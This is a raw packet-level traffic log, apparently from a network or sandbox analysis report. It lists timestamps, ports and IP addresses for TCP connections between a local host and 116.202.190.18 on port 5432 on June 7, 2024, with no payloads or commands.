Jun 7, 2024 17:21:17.518656969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.518691063 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.518695116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.518707037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.518754959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.519740105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.519792080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.519799948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.519846916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.519850016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.519881964 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.519916058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.519929886 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.519929886 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.520003080 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521420002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521473885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521478891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521505117 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521557093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521557093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521557093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521609068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521614075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521644115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521691084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521691084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521698952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521734953 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521744967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521842003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521893024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521893024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521913052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521944046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521980047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.521995068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.521995068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.522013903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.522043943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.522073030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.522989988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523058891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523087025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523123026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523156881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523174047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523174047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523284912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523678064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523708105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523734093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523760080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523782969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523792982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523827076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.523842096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523842096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.523897886 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.524604082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.524657011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.524691105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.524699926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.524699926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.524725914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.524775982 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.524775982 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.525346041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.525399923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.525404930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.525434971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.525450945 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.525468111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.525509119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.525509119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.526683092 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.526719093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.526755095 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.526767015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.526767015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.526787996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.526837111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.526837111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.528901100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.528929949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.528983116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529001951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529001951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529026031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529036999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529061079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529076099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529114962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529119968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529166937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529172897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529202938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529236078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529253960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529253960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529270887 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529304028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529304981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.529352903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.529352903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549072981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549146891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549185038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549216986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549216986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549221992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549259901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549273968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549273968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549314022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549315929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549350977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549386024 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549391985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549391985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549421072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549468994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549469948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549474955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549510956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549545050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549561024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549561024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549580097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549618006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549632072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549632072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549676895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549683094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549711943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549746990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549767971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549767971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549781084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549803019 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549833059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549834967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549868107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549920082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549920082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.549923897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549961090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.549997091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550014973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550014973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550030947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550067902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550079107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550079107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550101995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550139904 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550148964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550148964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550173998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550209045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550214052 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550242901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550246000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550265074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550276995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550328970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550331116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550365925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550378084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550378084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550420046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550456047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550471067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550471067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550489902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550509930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550543070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550581932 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550595999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550595999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550616980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550632000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550652027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550705910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550705910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550712109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550765991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550801039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550806999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550820112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550836086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550873041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550882101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550882101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550925016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.550929070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550985098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.550988913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551021099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551058054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551079988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551079988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551110983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551161051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551161051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551165104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551217079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551239014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551254034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551286936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551296949 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551320076 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551321030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551342964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551377058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551377058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551433086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551438093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551471949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551506996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551522970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551523924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551544905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551579952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551587105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551594973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551615953 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551651955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551667929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551667929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551687956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551723003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551740885 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551740885 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551758051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551793098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551815033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551815033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551829100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551862955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551882029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551882029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551898003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551918983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551933050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.551963091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.551969051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552002907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552011013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552037954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552048922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552048922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552073002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552107096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552124023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552124023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552141905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552179098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552194118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552194118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552211046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552239895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552246094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552280903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552287102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552314997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552331924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552333117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552351952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552386045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552406073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552406073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552422047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552455902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552474976 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552474976 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552517891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552525043 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552552938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552589893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552592993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552604914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552624941 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552661896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.552666903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552680016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.552772045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.657310963 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.657784939 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.662832975 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.662878990 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.663050890 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.663091898 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.663345098 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.668236971 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.508065939 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.511140108 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.511558056 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.513925076 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.513962984 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.516464949 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.518994093 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.519026041 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.795936108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.796438932 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.801481962 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.801589012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:18.801649094 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.801685095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.802043915 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:18.806957960 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.174257994 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.174345970 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.667491913 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.667798042 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.668359041 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.670828104 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.673429966 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.675780058 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.961771011 CEST	49717	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.962265015 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.968787909 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.969166040 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.969166040 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:19.970429897 CEST	5432	49717	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:19.970501900 CEST	49717	5432	192.168.2.5	116.202.190.18
